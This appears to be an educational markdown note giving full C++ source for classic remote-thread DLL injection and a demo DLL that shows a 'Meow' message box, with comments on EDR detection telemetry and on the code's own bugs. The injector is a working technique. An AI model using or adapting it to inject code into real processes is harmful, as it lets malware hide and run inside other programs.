

DLL injection.md


It takes the process identifier as a command-line argument, gets a handle to the process and writes the DLL path into it.

Sequence of APIs : OpenProcess -> VirtualAllocEx -> WriteProcessMemory -> CreateRemoteThread

The DLL just opens a message box.

evil_inj.cpp

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#include <tlhelp32.h>

/* Hard-coded path of the library the target process is told to load (it is
   passed to LoadLibraryA in the remote process, not loaded here). */
char evilDLL[] = "C:\\evil.dll";

/* Number of bytes copied into the target. sizeof(evilDLL) already includes the
   terminating NUL, so the +1 makes WriteProcessMemory read one byte past the
   end of the array (a one-byte over-read; undefined behavior). */
unsigned int evilLen = sizeof(evilDLL) + 1;

int main(int argc, char* argv[]){
    /*
     * Injector entry point. argv[1] is the target PID.
     *
     * The sequence OpenProcess -> VirtualAllocEx -> WriteProcessMemory ->
     * CreateRemoteThread(LoadLibraryA, <remote path buffer>) is the classic
     * remote-thread DLL injection. From a detection standpoint the telemetry
     * is: a cross-process handle with PROCESS_ALL_ACCESS, a cross-process
     * allocation and write, and a remote thread whose start address is
     * LoadLibraryA in kernel32 — this is the pattern EDR/ETW-based tooling
     * typically alerts on.
     *
     * Returns -1 when argv[1] does not parse as a non-zero integer, 0 otherwise.
     * None of the Win32 calls below are checked, so 0 does not imply success.
     */
    HANDLE ph;   /* handle to the target process */
    HANDLE rt;   /* handle to the remote thread; never closed (leaks until exit) */
    LPVOID rb;   /* buffer allocated inside the target for the DLL path */

    /* Resolve LoadLibraryA in this process. The code relies on the address
       being valid in the target process as well; nothing here verifies that
       (and hKernel32 / lb are not checked for NULL). */
    HMODULE hKernel32 = GetModuleHandle("Kernel32");
    FARPROC lb = GetProcAddress(hKernel32, "LoadLibraryA");

    /* NOTE(review): argv[1] is dereferenced without checking argc, so running
       with no argument is undefined behavior. atoi() returns 0 for both "0"
       and non-numeric input, which is the only case rejected here. */
    if(atoi(argv[1]) == 0){
        printf("PID not found :( exiting...\n");
        return -1;
    }

    printf("PID : %i", atoi(argv[1]));
    /* DWORD(...) is a C++ functional cast, so this file compiles only as C++.
       A failed OpenProcess returns NULL; it is not checked, and the invalid
       handle would propagate into every call below. */
    ph = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD(atoi(argv[1])));

    /* Reserve+commit evilLen bytes in the target and copy the path there.
       Neither return value is checked (VirtualAllocEx returns NULL on failure;
       WriteProcessMemory returns FALSE). */
    rb = VirtualAllocEx(ph, NULL, evilLen, (MEM_RESERVE | MEM_COMMIT), PAGE_READWRITE);

    WriteProcessMemory(ph, rb, evilDLL, evilLen, NULL);

    /* Start a thread in the target whose entry point is LoadLibraryA and whose
       single argument is the remote path buffer: the target loads the DLL
       itself, so DllMain of the loaded library runs inside the target.
       rt is neither checked nor closed. */
    rt = CreateRemoteThread(ph, NULL, 0, (LPTHREAD_START_ROUTINE)lb, rb, 0, NULL);
    CloseHandle(ph);
    return 0;
}

evil.cpp (DLL)

#include <windows.h>
#pragma comment (lib, "uesr32.lib")

/*
 * DLL entry point. When the library is loaded into a process
 * (DLL_PROCESS_ATTACH — here, by the remote LoadLibraryA thread the injector
 * creates) it shows a message box; every other notification reason is
 * ignored. Always returns TRUE so the load succeeds.
 *
 * Note: the #pragma comment above names "uesr32.lib", which looks like a typo
 * for user32.lib, the import library that provides MessageBox.
 */
BOOL APIENTRY DllMain(HMODULE hModule, DWORD nReason, LPVOID lpReserved){
    if (nReason == DLL_PROCESS_ATTACH) {
        MessageBox(NULL, "Meow from evil.dll", "=^..^=", MB_OK);
    }
    /* DLL_PROCESS_DETACH, DLL_THREAD_ATTACH and DLL_THREAD_DETACH: nothing to do. */
    return TRUE;
}